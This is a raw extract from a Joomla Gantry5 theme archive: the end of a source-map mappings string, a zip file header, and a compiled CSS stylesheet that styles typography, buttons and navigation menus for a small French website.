KD,gEAAA;AAAA;AAAA;;;cAAA;AAAA;AAKC,gEAAA;AAAA;AAAA,yBAAA;AAAA;AAEC,gEAAA;AAAA;AAAA,yBAAA;AAAA;AAEC,gEAAA;AAAA;AAAA,6BAAA;AAAA;ACrOP,kEAAA;AACC,kEAAA;AAAA;AAAA;;;;qBAAA;AAAA;AAMC,mEAAA;AACC,mEAAA;AAAA;AAAA;;;;;;wBAAA;AAAA;AAMC,mEAAA;AAAA;AAAA;iBAAA;AAAA;AAIA,mEAAA;AAAA;AAAA,oBAAA;AAAA;AAID,mEAAA;AACC,mEAAA;AAAA;AAAA,sBAAA;AAAA;AAID,mEAAA;AAAA;AAAA;gBAAA;AAAA;AAGC,mEAAA;AAAA;AAAA,iBAAA;AAAA;AAEC,mEAAA;AAAA;AAAA,qBAAA;AAAA;AAID,mEAAA;AACC,mEAAA;AAAA;AAAA,gCAAA;AAAA;AAKF,mEAAA;AACC,mEAAA;AAAA;AAAA;iBAAA;AAAA;AAIA,mEAAA;AAAA;AAAA,iBAAA;AAAA;AAEC,mEAAA;AAAA;AAAA,qBAAA;AAAA;ACnDL,wEAAA;AACC,wEAAA;AAAA;AAAA;qBAAA;AAAA;AAGC,wEAAA;AAAA;AAAA,sBAAA;AAAA;AAGA,wEAAA;AAAA;AAAA,mBAAA;AAAA;AAGA,yEAAA;AAAA;AAAA;;;mBAAA;AAAA;AAKC,yEAAA;AAAA;AAAA,wBAAA;AAAA;AAOH,yEAAA;AACC,yEAAA;AACC,yEAAA;AAAA;AAAA,mBAAA;AAAA;AAMF,yEAAA;AACC,yEAAA;AAAA;AAAA;mBAAA;AAAA;AAIA,yEAAA;AAAA;AAAA,qBAAA;AAAA;AAEC,yEAAA;AAAA;AAAA,mBAAA;AAAA;AAGA,yEAAA;AAAA;AAAA,mBAAA;AAAA;AAID,yEAAA;AAAA;AAAA;0BAAA;AAAA;AAIA,yEAAA;AAAA;AAAA;;wBAAA;AAAA;AAKC,yEAAA;AAAA;AAAA,gBAAA;AAAA;AAMF,yEAAA;AACC,yEAAA;AAAA;AAAA,mBAAA;AAAA;AAGA,yEAAA;AACC,yEAAA;AACC,yEAAA;AAAA;AAAA,qBAAA;AAAA;AAOH,yEAAA;AACC,yEAAA;AACC,yEAAA;AAAA;AAAA,mBAAA;AAAA;AAMF,yEAAA;AACC,yEAAA;AAAA;AAAA,4BAAA;AAAA;AxD1DC;AAAA;AAAA,qBAAA;AAAA;AAAA;AwDiED,yEAAA;AAAA;AAAA,0BAAA;AAAA;AAGA,yEAAA;AACC,yEAAA;AAAA;AAAA;4BAAA;AAAA;AxDrEA;AAAA;AAAA,oBAAA;AAAA;AAAA;AwD4EA,0EAAA;AAAA;AAAA;;8BAAA;AAAA;AxD5EA;AAAA;AAAA;qBAAA;AAAA;AAAA;AAAA;AwDuFA,4EAAA;AAAA;AAAA,sBAAA;AAAA;AAAA;AAID,0EAAA;AAAA;AAAA,qBAAA;AAAA;AAKD,0EAAA;AACC,0EAAA;AAAA;AAAA,yBAAA;AAAA;AAGC,0EAAA;AAAA;AAAA,WAAA;AAAA;AAID,0EAAA;AACC,0EAAA;AAAA;AAAA,eAAA;AAAA;AAGA,0EAAA;AAAA;AAAA;;;;;;;;;;;;;;;;;;;;;;;;;;;;;kBAAA;AAAA;AASC,0EAAA;AAAA;AAAA,iBAAA;AAAA;AAEC,0EAAA;AAAA;AAAA,iBAAA;AAAA;AAEC,0EAAA;AAAA;AAAA;iBAAA;AAAA;AAKD,0EAAA;AAAA;AAAA;;;;;oBAAA;AAAA;AASD,0EAAA;AAAA;AAAA,iBAAA;AAAA;AAGA,0EAAA;AAAA;AAAA,iBAAA;AAAA;AAGA,0EAAA;AAAA;AAAA,iBAAA;AAAA;AAEC,0EAAA;AAAA;AAAA;iBAAA;AAAA;AAKD,0EAAA;AACC,0EAAA;AAAA;AAAA,mCAAA;AAAA;AAMH,0EAAA;AAAA;AAAA;0BAAA;AAAA;AAMD,0EAAA;AACC,0EAAA;AAAA;AAAA,sBAAA;AAAA;AACC,0EAAA;AAAA;AAAA;;;;;;wBAAA;AAAA;AAMC,0EAAA;AAAA;AAAA;0BAAA;AAAA;AAMD,0EAAA;AAAA;AAAA;;gBAAA;AAAA;AAMA,0EAAA;AAAA;AAAA,mBAAA;AAAA;AAMF,0EAAA;AACC,0EAAA;AAAA;AAAA,mBAAA;AAAA;AAGC,0EAAA;AACC,0EAAA;AAAA;AAAA,gBAAA;AAAA;AAEC,0EAAA;AAAA;AAAA;sBAAA;AAAA;AAKD,0EAAA;AACC,0EAAA;AAAA;AAAA;6BAAA;AAAA;AAID,0EAAA;AACC,0EAAA;AAAA;AAAA;gCAAA;AAAA;AAID,0EAAA;AACC,0EAAA;AAAA;AAAA;sBAAA;AAAA;AAMF,0EAAA;AACC,0EAAA;AACC,0EAAA;AAAA;AAAA;gBAAA;AAAA;AASJ,0EAAA;AACC,0EAAA;AACC,0EAAA;AAAA;AAAA,mBAAA;AAAA;AAID,0EAAA;AACC,0EAAA;AACC,0EAAA;AAAA;AAAA;0BAAA;AAAA;AAQH,0EAAA;AAEC,0EAAA;AACC,0EAAA;AAAA;AAAA,iBAAA;AAAA;AAEC,0EAAA;AAAA;AAAA,iBAAA;AAAA;AC\/QH,gEAAA;AACC,gEAAA;AAAA;AAAA;;;;;;;;;;;;;;uBAAA;AAAA;AAcC,iEAAA;AAAA;AAAA;;wBAAA;AAAA;AAKA,iEAAA;AAAA;AAAA;cAAA;AAAA;AAIA,iEAAA;AAAA;AAAA;;4BAAA;AAAA;AAIC,iEAAA;AAAA;AAAA;;4BAAA;AAAA;AAMD,iEAAA;AAAA;AAAA;;wBAAA;AAAA;AAIC,iEAAA;AAAA;AAAA;wBAAA;AAAA;AAKD,iEAAA;AAAA;AAAA;;wBAAA;AAAA;AAIC,iEAAA;AAAA;AAAA;wBAAA;AAAA;AAKD,iEAAA;AAAA;AAAA;;wBAAA;AAAA;AAIC,iEAAA;AAAA;AAAA;wBAAA;AAAA;AAKD,iEAAA;AAAA;AAAA;;wBAAA;AAAA;AAIC,iEAAA;AAAA;AAAA;wBAAA;AAAA;AAKD,iEAAA;AAAA;AAAA;;wBAAA;AAAA;AAIC,iEAAA;AAAA;AAAA;wBAAA;AAAA;AAKD,iEAAA;AAAA;AAAA;;;mBAAA;AAAA;AAKC,iEAAA;AAAA;AAAA,iBAAA;AAAA;AAID,iEAAA;AAAA;AAAA;yBAAA;AAAA;AAMD,iEAAA;AACC,iEAAA;AAAA;AAAA,mBAAA;AAAA;AAGA,kEAAA;AAAA;AAAA;4BAAA;AAAA;AAGA,kEAAA;AAAA;AAAA;6BAAA;AAAA;AAMD,kEAAA;AACC,kEAAA;AAAA;AAAA;;;;;8BAAA;AAAA;AAKC,kEAAA;AAAA;AAAA;cAAA;AAAA;AAMF,kEAAA;AACC,kEAAA;AAAA;AAAA,mBAAA;AAAA;ACxHF,qFAAA;AAAA;AAAA,eAAA;AAAA;A1DKE;AAAA;AAAA,iBAAA;AAAA;AAAA;AAMA;AAAA;AAAA,iBAAA;AAAA;AAAA;AAGA;AAAA;AAAA,iBAAA;AAAA;AAAA;AAGA;AAAA;AAAA,gBAAA;AAAA;AAAA;A0DFD,sFAAA;AAAA;AAAA,cAAA;AAAA;AAMD,sFAAA;A1DEE;AAAA;AAAA;;;;;;;kCAAA;AAAA;AAAA;A0DKF,sFAAA;A1DLE;AAAA;AAAA;;;;;;;;oBAAA;AAAA;AAAA;AAAA;A0DeD;AACC,0FAAA;AAAA;AAAA;;;;;;;yBAAA;AAAA;AAIA,0FAAA;AAAA;AAAA;;;;;;;oBAAA;AAAA;AAAA;AAAA;AC3CF,0FAAA;AAAA;AAAA,2BAAA;AAAA;A3DuBE;A2DXA,6FAAA;AAAA;AAAA,8BAAA;AAAA;AAGA,6FAAA;AAAA;AAAA,8BAAA;AAAA;AAAA;A3DJA;A2DUA,6FAAA;AAAA;AAAA,8BAAA;AAAA;AAGA,6FAAA;AAAA;AAAA,8BAAA;AAAA;AAAA;A3DnBA;A2DyBA,6FAAA;AAAA;AAAA,8BAAA;AAAA;AAGA,6FAAA;AAAA;AAAA,8BAAA;AAAA;AAAA;A3D\/BA;A2DqCA,6FAAA;AAAA;AAAA,8BAAA;AAAA;AAGA,6FAAA;AAAA;AAAA,8BAAA;AAAA;AAGA,6FAAA;AAAA;AAAA,8BAAA;AAAA;AAGA,6FAAA;AAAA;AAAA,8BAAA;AAAA;AAAA;A3DzBA;A2DgCA,6FAAA;AAAA;AAAA,6BAAA;AAAA;AAAA;A3D5CA;A2DkDA,6FAAA;AAAA;AAAA,6BAAA;AAAA;AAAA;A3DxDA;A2D8DA,6FAAA;AAAA;AAAA,6BAAA;AAAA;AAAA;A3DjEA;A2DuEA,6FAAA;AAAA;AAAA,6BAAA;AAAA;AAGA,6FAAA;AAAA;AAAA,6BAAA;AAAA;AAAA;A3DrDA;A2D4DA,6FAAA;AAAA;AAAA,mCAAA;AAAA;AAGA,6FAAA;AAAA;AAAA,mCAAA;AAAA;AAAA"}PK!�	�X�?�?,it_sanctum/custom/css-compiled/sanctum_9.cssnu&1i�/* GANTRY5 DEVELOPMENT MODE ENABLED.
 *
 * WARNING: This file is automatically generated by Gantry5. Any modifications to this file will be lost!
 *
 * For more information on modifying CSS, please read:
 *
 * http://docs.gantry.org/gantry5/configure/styles
 * http://docs.gantry.org/gantry5/tutorials/adding-a-custom-style-sheet
 */

@charset "UTF-8";
@import url('//fonts.googleapis.com/css?family=Lato');
@import url('//fonts.googleapis.com/css?family=Cormorant+SC');
.g-content {
  margin: 0.625rem;
  padding: 0.938rem;
}
.g-flushed .g-content {
  margin: 0;
  padding: 0;
}
body {
  font-size: 1rem;
  line-height: 1.5;
}
h1 {
  font-size: 2.7rem;
}
h2 {
  font-size: 2.07rem;
}
h3 {
  font-size: 1.8rem;
}
h4 {
  font-size: 1.35rem;
}
h5 {
  font-size: 0.9rem;
}
h6 {
  font-size: 0.81rem;
}
small {
  font-size: 0.875rem;
}
cite {
  font-size: 0.875rem;
}
sub, sup {
  font-size: 0.75rem;
}
code, kbd, pre, samp {
  font-size: 1rem;
  font-family: "Menlo", "Monaco", monospace;
}
textarea, select[multiple=multiple], input[type="color"], input[type="date"], input[type="datetime"], input[type="datetime-local"], input[type="email"], input[type="month"], input[type="number"], input[type="password"], input[type="search"], input[type="tel"], input[type="text"], input[type="time"], input[type="url"], input[type="week"], input:not([type]) {
  border-radius: 0;
}
body, #g-page-surround {
  color: #959595;
  background-color: #ffffff;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
#g-page-surround {
  box-shadow: 0 0 15px rgba(0, 0, 0, 0.4);
}
@media print {
  #g-page-surround {
    background: #fff !important;
    color: #000 !important;
  }
}
a {
  color: #4f953b;
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
a:hover {
  color: #325e25;
}
h1, h2, h3, h4, h5, h6, strong {
  color: #282828;
}
.button {
  display: inline-block;
  padding: 0.5rem 1rem;
  border-radius: 0;
  background: #4f953b;
  color: #ffffff;
  border: 1px solid #4f953b;
  line-height: 1.5;
  font-size: 0.9rem;
  vertical-align: middle;
  text-shadow: none;
  box-shadow: none;
  text-align: center;
  -webkit-transition: background 0.2s;
  -moz-transition: background 0.2s;
  transition: background 0.2s;
}
.button:hover {
  color: #ffffff;
  background: #40782f;
}
.button:active, .button:focus {
  color: #ffffff;
  background: #437f32;
}
.button.dark {
  background: #282828;
  border: 1px solid #282828;
}
.button.dark:hover, .button.dark:active, .button.dark:focus {
  background: #474747;
}
.button.empty {
  background: none;
  border: 1px solid #4f953b;
  color: #4f953b;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
.button.empty:hover {
  color: #ffffff;
  background: #4f953b;
}
.button.button-grey {
  background: #a8a8a8;
  color: #ffffff;
  border: 1px solid #a8a8a8;
}
.button.button-grey:hover {
  background: #999;
  border: 1px solid #999;
}
.button.button-green {
  background: #4f953b;
  border: 1px solid #4f953b;
}
.button.button-green:hover {
  background: #437f32;
  border: 1px solid #437f32;
}
.button.button-orange {
  background: #f26d5b;
  border: 1px solid #f26d5b;
}
.button.button-orange:hover {
  background: #f0543f;
  border: 1px solid #f26d5b;
}
.button.button-purple {
  background: #8283a7;
  border: 1px solid #8283a7;
}
.button.button-purple:hover {
  background: #70719a;
  border: 1px solid #70719a;
}
.button.button-blue {
  background: #2b90d9;
  border: 1px solid #2b90d9;
}
.button.button-blue:hover {
  background: #2380c3;
  border: 1px solid #2380c3;
}
.button.button-xlarge {
  font-size: 1.4rem;
}
.button.button-large {
  font-size: 1.2rem;
}
.button.button-small {
  font-size: 0.8rem;
}
.button.button-xsmall {
  font-size: 0.7rem;
}
.button.button-block {
  display: block;
}
.g-title {
  margin-top: -5px;
  margin-bottom: 30px;
  position: relative;
}
.g-title:after {
  content: "";
  height: 1px;
  width: 70px;
  margin: 20px 0;
  display: block;
  background: #dddddd;
}
#g-offcanvas .g-title:before, #g-offcanvas .g-title:after, .g-particle-intro .g-title:before, .g-particle-intro .g-title:after {
  display: none;
}
#g-aside .g-title, #g-sidebar .g-title {
  font-size: 1.35rem;
  margin-top: 0;
  margin-bottom: 25px;
}
#g-aside .g-title:before, #g-aside .g-title:after, #g-sidebar .g-title:before, #g-sidebar .g-title:after {
  width: 60px;
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  #g-aside .g-title:before, #g-aside .g-title:after, #g-sidebar .g-title:before, #g-sidebar .g-title:after {
    display: none;
  }
}
#g-aside .text-center .g-title:before, #g-aside .text-center .g-title:after, #g-aside .title-center .g-title:before, #g-aside .title-center .g-title:after, #g-sidebar .text-center .g-title:before, #g-sidebar .text-center .g-title:after, #g-sidebar .title-center .g-title:before, #g-sidebar .title-center .g-title:after {
  width: 40px;
}
#g-aside .g-content > div, #g-sidebar .g-content > div {
  margin-bottom: 50px;
}
#g-aside .g-content > div:last-child, #g-sidebar .g-content > div:last-child {
  margin-bottom: 0;
}
.border-bottom {
  border-bottom: 1px solid #dddddd;
}
.border-top {
  border-top: 1px solid #dddddd;
}
.g-logo {
  margin: 10px 0;
  display: inline-block;
}
.g-logo > .g-content {
  margin-top: 0;
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-logo {
    display: block;
    text-align: center;
  }
}
.g-logo img {
  width: auto;
}
.logo-large {
  display: inline-block;
}
.g-gutter {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-gutter .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
.fullwidth-section {
  padding: 0 !important;
}
.fullwidth-section > .g-container {
  width: 100%;
}
.fullwidth-section .g-content {
  padding: 0;
  margin: 0;
}
.g-center-vertical {
  display: -webkit-box;
  display: -moz-box;
  display: box;
  display: -webkit-flex;
  display: -moz-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -moz-box-align: center;
  box-align: center;
  -webkit-align-items: center;
  -moz-align-items: center;
  -ms-align-items: center;
  -o-align-items: center;
  align-items: center;
  -ms-flex-align: center;
}
.tooltip h1, .tooltip h2, .tooltip h3, .tooltip h4, .tooltip h5, .tooltip h6, .tooltip strong {
  color: #ffffff !important;
}
.presets-demo .g-dropdown .g-menu-item-container:before {
  content: "";
  position: absolute;
  width: 20px;
  height: 20px;
  margin-top: 2px;
  border-radius: 0px;
  background: #000000;
  border: 1px solid #ffffff;
}
.presets-demo .g-dropdown .g-menu-item-container .g-menu-item-content {
  margin-left: 30px;
}
.presets-demo .g-dropdown .preset1 .g-menu-item-container:before {
  background: #c91f37;
}
.presets-demo .g-dropdown .preset2 .g-menu-item-container:before {
  background: #4f953b;
}
.presets-demo .g-dropdown .preset3 .g-menu-item-container:before {
  background: #f26d5b;
}
.presets-demo .g-dropdown .preset4 .g-menu-item-container:before {
  background: #8283a7;
}
.presets-demo .g-dropdown .preset5 .g-menu-item-container:before {
  background: #2b90d9;
}
.presets-demo .g-dropdown .preset6 .g-menu-item-container:before {
  background: #f2aa0f;
}
#g-mobilemenu-container .presets-demo .g-dropdown .g-go-back .g-menu-item-container:before {
  content: "";
  position: relative;
  width: 1.28571em;
  height: auto;
  margin-top: 0;
  border-radius: 0;
  background: none;
}
#g-mobilemenu-container .presets-demo .g-dropdown .g-go-back .g-menu-item-container .g-menu-item-content {
  margin-left: 30px;
}
.g-perso {
  font-family: "Lato";
  font-weight: 400;
  font-size: 0.9rem;
  color: #ffffff;
  background-color: #7ac572;
}
.g-perso-left {
  margin-bottom: 0;
  border-left: -20px solid white;
  background-color: #fff;
}
.g-image2 {
  background-image: url('//www.ptits-anes.fr/images/Demo/elements/story2.jpg');
  background-repeat: no-repeat;
  padding-left: 0px;
  padding-top: 0px;
}
.g-image3 {
  background-image: url('//www.ptits-anes.fr/images/Demo/elements/story3.jpg');
  background-repeat: no-repeat;
}
body {
  font-family: "Lato";
  font-weight: 400;
  font-size: 0.9rem;
}
h1, h2, h3, h4, h5, h6 {
  font-family: "Cormorant SC";
  font-weight: 500;
  margin-top: -5px;
}
h1 {
  font-size: 2.7rem;
}
h2 {
  font-size: 2.07rem;
}
h3 {
  font-size: 1.8rem;
}
h4 {
  font-size: 1.35rem;
}
h5 {
  font-size: 0.9rem;
}
h6 {
  font-size: 0.81rem;
}
.g-main-nav {
  font-family: "Cormorant SC";
  font-weight: 400;
  font-size: 1rem;
}
.g-main-nav .g-dropdown {
  font-size: 0.9rem;
}
bold, strong {
  font-weight: 700;
}
.button {
  font-weight: 500;
}
blockquote {
  border-left: 10px solid #F0F2F4;
}
blockquote p {
  font-size: 1rem;
  color: #c8c8c8;
  margin-bottom: 1rem !important;
}
blockquote cite {
  display: block;
  text-align: right;
  color: #959595;
  font-size: 1.1rem;
}
blockquote small:before {
  content: none !important;
}
code {
  background: #fafafa;
  color: #d05;
  font-size: 0.81rem;
  border: 1px solid #dddddd;
}
pre {
  padding: 1rem;
  margin: 2rem 0;
  background: #f8f8f8;
  border: 1px solid #dddddd;
  border-radius: 0;
  line-height: 1.15;
  font-size: 0.81rem;
  border: 1px solid #dddddd;
}
pre code {
  color: #237794;
  background: inherit;
  font-size: 0.81rem;
}
pre.prettyprint {
  border: 1px solid #dddddd !important;
  padding: 1rem !important;
}
hr {
  border-bottom: 1px solid #dddddd;
}
hr.uk-article-divider {
  border-color: #dddddd;
  margin-bottom: 35px;
}
* + .uk-article-divider {
  margin-top: 35px;
}
.uk-table-hover tbody tr:hover {
  background: #dddddd;
}
.uk-badge {
  margin-right: 5px;
}
.g-typography-page > section {
  margin-top: 150px;
}
.g-typography-page > section:first-child {
  margin-top: 0;
}
iframe {
  border: none;
}
.uk-accordion .uk-accordion-title {
  background: #dddddd;
  border: 1px solid #dddddd;
  border-radius: 3px;
}
.uk-tab-grid::before {
  border-color: #dddddd;
}
#g-navigation {
  background-color: #ffffff;
  color: #008056;
  text-align: center;
  position: relative;
  z-index: 1002;
}
#g-navigation h1, #g-navigation h2, #g-navigation h3, #g-navigation h4, #g-navigation h5, #g-navigation h6, #g-navigation strong {
  color: #959595;
}
#g-navigation > .g-container {
  position: relative;
}
#g-navigation .g-content {
  padding-top: 0;
  padding-bottom: 0;
  margin-top: 0;
  margin-bottom: 0;
}
#g-navigation.uk-active[data-uk-sticky] {
  box-shadow: 0 3px 3px rgba(0, 0, 0, 0.05);
}
.uk-sticky-placeholder #g-navigation .uk-active {
  box-shadow: 0 3px 3px rgba(0, 0, 0, 0.05);
}
#g-navigation .align-left .g-toplevel, #g-header .align-left .g-toplevel {
  justify-content: flex-start;
  -webkit-justify-content: flex-start;
}
#g-navigation .align-right .g-toplevel, #g-header .align-right .g-toplevel {
  justify-content: flex-end;
  -webkit-justify-content: flex-end;
}
@media print {
  #g-navigation {
    background: #fff !important;
    color: #000 !important;
  }
}
.g-main-nav .g-toplevel > li > .g-menu-item-container, .g-main-nav .g-sublevel > li > .g-menu-item-container {
  padding: 0.2345rem 0.469rem;
  white-space: nowrap;
  -webkit-transition: background 0.2s, color 0.2s;
  -moz-transition: background 0.2s, color 0.2s;
  transition: background 0.2s, color 0.2s;
}
.g-main-nav .g-standard .g-dropdown {
  width: 180px;
  float: left;
}
.g-main-nav {
  z-index: 20;
}
.g-main-nav:not(.g-menu-hastouch) .g-toplevel > li > .g-menu-item-container .g-menu-parent-indicator {
  display: none;
}
.g-main-nav:not(.g-menu-hastouch) .g-dropdown {
  z-index: 1003;
}
.g-main-nav .g-toplevel > li > .g-menu-item-container {
  line-height: 1;
}
.g-main-nav .g-toplevel > li > .g-menu-item-container > .g-menu-item-content {
  line-height: normal;
  text-align: center;
}
.g-main-nav .g-toplevel > li.g-parent .g-menu-parent-indicator:after {
  width: 1rem;
}
.g-main-nav .g-toplevel i {
  opacity: 1;
}
.g-main-nav .g-dropdown {
  text-align: left;
  border-radius: none;
}
.dir-rtl .g-main-nav .g-dropdown {
  text-align: right;
}
.g-main-nav .g-sublevel > li {
  margin: 0;
  padding: 0;
}
.g-main-nav .g-sublevel > li > .g-menu-item-container {
  font-weight: normal;
}
.g-main-nav .g-sublevel > li > .g-menu-item-container > .g-menu-item-content {
  vertical-align: middle;
}
.g-main-nav .g-sublevel > li.g-parent .g-menu-parent-indicator {
  right: 10px;
  top: 13px;
}
.g-main-nav .g-sublevel > li.g-parent .g-menu-parent-indicator:after {
  content: "";
  opacity: 0.75;
  font-size: 0.9rem;
}
.g-main-nav .g-sublevel > li:hover.g-parent .g-menu-parent-indicator:after {
  content: "" !important;
}
.g-main-nav .g-fullwidth > .g-dropdown {
  margin: 0 1.563rem;
}
.g-main-nav .g-fullwidth > .g-dropdown[data-g-item-width] {
  margin-left: 0;
  margin-right: 0;
}
@media (-ms-high-contrast: none), (-ms-high-contrast: active) {
  .g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid {
    -webkit-flex-flow: row;
    -moz-flex-flow: row;
    flex-flow: row;
  }
}
.g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid .g-block {
  border-right: 1px solid rgba(255, 255, 255, 0.1);
}
.g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid .g-block:last-child {
  border-right: none;
}
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel > li:hover .g-menu-parent-indicator:after, .g-main-nav .g-fullwidth > .g-dropdown .g-sublevel > li.active .g-menu-parent-indicator:after {
  color: #008056;
  opacity: 1;
}
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel > li a {
  padding: 12px 20px !important;
}
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel .g-menu-parent-indicator {
  top: 10px !important;
}
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel .g-menu-parent-indicator:after {
  background: rgba(0, 0, 0, 0.99);
  color: #ffffff !important;
  border: 1px solid rgba(255, 255, 255, 0.3);
  border-radius: 4px;
  height: 1.5rem;
  width: 1.5rem !important;
  padding: 0.15rem;
  text-align: center;
  line-height: 18px;
  opacity: 1;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel .g-menu-parent-indicator:hover:after {
  background: rgba(77, 77, 77, 0.99);
}
.g-menu-item-subtitle {
  opacity: 1;
}
.g-menu-overlay.g-menu-overlay-open {
  z-index: 19;
}
.g-main-nav .g-standard .g-dropdown .flyout-left .g-dropdown {
  left: auto;
  right: 100%;
}
.g-menu-hastouch .g-standard .g-toplevel > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator, .g-menu-hastouch .g-fullwidth .g-toplevel > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator {
  border-radius: 0;
  margin: -0.2rem 0 -0.2rem 0.5rem;
  padding: 0.2rem;
}
.g-menu-hastouch .g-standard .g-sublevel > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator, .g-menu-hastouch .g-fullwidth .g-sublevel > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator {
  border-radius: 0;
  padding: 0.1rem;
  margin-top: -0.1rem;
  margin-right: -0.1rem;
}
[dir="rtl"] .g-main-nav .g-sublevel > li.g-parent .g-menu-item-content {
  margin-right: 0;
  margin-left: 2rem;
}
[dir="rtl"] .g-main-nav .g-sublevel > li.g-parent .g-menu-parent-indicator {
  right: auto;
  left: 10px;
  margin-top: 3px;
  -webkit-transform: rotate(180deg);
  -moz-transform: rotate(180deg);
  -ms-transform: rotate(180deg);
  -o-transform: rotate(180deg);
  transform: rotate(180deg);
}
[dir="rtl"] .g-main-nav .g-toplevel > li:last-child {
  margin-right: 5px !important;
  margin-left: 5px !important;
}
[dir="rtl"] .g-main-nav .g-toplevel > li:last-child .g-menu-item-container {
  padding-right: 1rem !important;
}
[dir="rtl"] .g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid .g-block {
  border-right: none;
  border-left: 1px solid rgba(255, 255, 255, 0.1);
}
[dir="rtl"] .g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid .g-block:last-child {
  border-left: none;
}
#g-navigation .g-main-nav {
  margin: 0;
}
#g-navigation .g-main-nav .g-toplevel > li {
  margin: 0 5px;
  text-transform: uppercase;
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  #g-navigation .g-main-nav .g-toplevel > li {
    margin: 0;
  }
}
#g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container {
  color: #008056;
  padding: 1rem;
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  #g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container {
    padding: 0.5rem;
  }
}
@media only all and (max-width: 47.99rem) {
  #g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container {
    padding: 0.5rem;
  }
}
#g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container a {
  color: #008056;
}
#g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container a:hover {
  color: #4f953b;
}
#g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container .g-menu-parent-indicator:after {
  content: "";
  opacity: 0.75;
  padding: 0.1rem;
  border: 1px solid #dddddd;
  background: #f7f7f7;
  margin-left: 2px;
  border-radius: 4px;
  width: 1.2rem;
  text-align: center;
}
#g-navigation .g-main-nav .g-toplevel > li:hover > .g-menu-item-container, #g-navigation .g-main-nav .g-toplevel > li.active > .g-menu-item-container {
  color: #4f953b;
}
#g-navigation .g-main-nav .g-toplevel > li:hover > .g-menu-item-container > .g-selected, #g-navigation .g-main-nav .g-toplevel > li.active > .g-menu-item-container > .g-selected {
  color: #4f953b;
}
#g-navigation .g-main-nav .g-dropdown {
  text-transform: initial;
  color: #ffffff;
  background: rgba(0, 0, 0, 0.8);
  font-family: "Lato";
  border-radius: 0;
  box-shadow: 0 6px 6px rgba(0, 0, 0, 0.05);
}
#g-navigation .g-main-nav .g-dropdown .g-menu-item-container {
  color: #ffffff;
  padding: 12px 15px;
}
#g-navigation .g-main-nav .g-dropdown li {
  border-bottom: 1px solid rgba(255, 255, 255, 0.1);
}
#g-navigation .g-main-nav .g-dropdown .g-dropdown-column {
  border-bottom: none;
}
#g-navigation .g-main-nav .g-sublevel > li > .g-menu-item-container {
  color: #ffffff;
  font-weight: normal;
}
#g-navigation .g-main-nav .g-sublevel > li > .g-menu-item-container > .g-selected {
  color: #ffffff;
  font-weight: normal;
  background: #4f953b;
}
#g-navigation .g-main-nav .g-sublevel > li:hover > .g-menu-item-container, #g-navigation .g-main-nav .g-sublevel > li.active > .g-menu-item-container {
  background: #4f953b;
  color: #ffffff;
}
#g-navigation .g-main-nav .g-sublevel > li:hover > .g-menu-item-container > .g-selected, #g-navigation .g-main-nav .g-sublevel > li.active > .g-menu-item-container > .g-selected {
  background: #4f953b;
  color: #ffffff;
}
#g-navigation .g-main-nav .g-sublevel > li.active > .g-menu-item-container {
  color: #ffffff;
}
#g-navigation .g-main-nav .g-sublevel > li:last-child {
  border-bottom: none;
}
#g-navigation .g-main-nav .g-sublevel > li.g-menu-item-type-particle:hover > .g-menu-item-container {
  background: inherit;
}
@media only all and (max-width: 47.99rem) {
  #g-navigation .g-menu-block {
    display: none;
  }
}
#g-navigation .g-menu-item-subtitle {
  font-size: 0.75rem;
  font-weight: normal;
  opacity: 1;
  padding-top: 5px;
}
.menu-item-particle a {
  color: #4f953b;
}
.menu-item-particle a:hover {
  color: #008056;
}
#g-offcanvas {
  background: #ffffff;
  width: 17rem;
  color: #959595;
}
#g-offcanvas a {
  color: white;
}
#g-offcanvas a:hover {
  color: #959595;
}
#g-offcanvas h1, #g-offcanvas h2, #g-offcanvas h3, #g-offcanvas h4, #g-offcanvas h5, #g-offcanvas h6, #g-offcanvas strong {
  color: #959595;
}
#g-offcanvas .button {
  background: #282828;
  color: #959595;
}
#g-offcanvas .button:hover {
  background: #353535;
}
#g-offcanvas .button:active {
  background: #1b1b1b;
}
.g-offcanvas-toggle {
  font-size: 1.6rem;
  color: #959595;
  text-align: center;
  top: 0;
  left: initial;
  position: relative;
}
#g-offcanvas #g-mobilemenu-container ul {
  background: #ffffff;
}
#g-offcanvas #g-mobilemenu-container ul > li {
  -webkit-transition: background 0.2s, color 0.2s;
  -moz-transition: background 0.2s, color 0.2s;
  transition: background 0.2s, color 0.2s;
}
#g-offcanvas #g-mobilemenu-container ul > li.g-menu-item-type-particle {
  display: none !important;
}
#g-offcanvas #g-mobilemenu-container ul > li > .g-menu-item-container {
  color: #959595;
  border-bottom: 1px solid #f0f0f0;
}
